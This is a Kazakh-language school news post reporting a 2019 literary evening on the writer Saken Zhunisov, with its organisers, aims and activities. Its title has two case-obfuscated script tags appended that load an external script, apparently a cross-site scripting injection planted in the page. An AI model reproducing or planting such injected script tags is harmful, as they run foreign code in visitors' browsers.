"Сұлу сөздің сүлейі - Сәкен сері" әдеби кеш<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

18.02.2019

          С.Жүнісов 85 жылдығына орай №18 ОМЛ өтіп жатқан айлық аясында "Сұлу сөздің сүлейі - Сәкен сері" атты мектеп кітапханашысы Ахметова Алтын Жақпаровна, 8 "ә" сыныбымен қазақ тілі мұғалімі Нұрмұқанова Жұмагүл Жабеновна және мектепте іс-тәжірибеде өтіп жатқан Ж.Мусин атындағы педагогикалық колледжінің студенттері Түлек Назерке мен Батай Нұраймның ұйымдастыруымен әдеби кеш өтті.

          Кеш мақсаты: Сәкен Жүнісовтың өмірі мен шығармаларын оқып білуге баулу, жазушының өз заманындағы саяси - қоғамдық көзқарасын таныту, ұлтжанды ұрпақ тәрбиелеу.

          Шара барысында дарынды жазушының өмірі жайлы баяндамалар мен шығармаларынан үзінділер, "Сақау бәтеңке" кітабы бойынша рөлдік оқуы оқылып, "Халықтың ардақты ұлы - Сәкен сері" атты кітап көрмесі оқушыларға көрсетілді.

 

Автор:қазақ тілі мұғалімі Нұрмұқанова Жұмагүл Жабеновна

Просмотров: 1703


Пікір қосу



Деректерді қолтаңбаға қосу